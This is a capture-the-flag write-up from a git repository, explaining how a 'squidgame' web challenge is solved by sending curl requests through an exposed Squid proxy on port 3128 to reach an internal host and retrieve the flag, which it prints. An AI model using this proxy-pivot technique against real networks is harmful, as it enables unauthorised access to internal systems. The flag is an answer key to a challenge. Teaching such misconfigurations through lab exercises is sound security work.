ig-ctf-solutions/write-ups-challenges-2021-2022
2
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
f76fc1af01
write-ups-challenges-2021-2022/squidgame/SOLUTION.md
Lars Palinckx e2a2d2c408 added writeups
2021-12-03 00:33:26 +01:00

997 B
Raw Blame History

Difficulty

Moderate 40 punten

How to solve

When you open the webpage you will get a link to the flag, but unfortunately that links results in a Forbidden error. The second link on that webpage refers to some documentation page, but points to an internal IP address.

On the same IP address as the webserver, a process is running on port 3128, this port is well known for hosting the caching proxy server "Squid". Trying to proxy requests to the documentation over "Squid" using:

$ curl -x http://IP\_OF\_CHALLENGE:3128 http://10.10.0.33/documentation.txt

reveals the content of the documentation site:

TODO: document infrastructure

This means that the proxy does not sufficiently protect its internal network it has access to. Therefore, we might be able to fetch the flag from the same IP address through the proxy:

$ curl -x http://IP\_OF\_CHALLENGE:3128 http://10.10.0.33/flag.txt 
IGCTF{BeCarefulWithTheRules}

Flag

IGCTF{BeCarefulWithTheRules}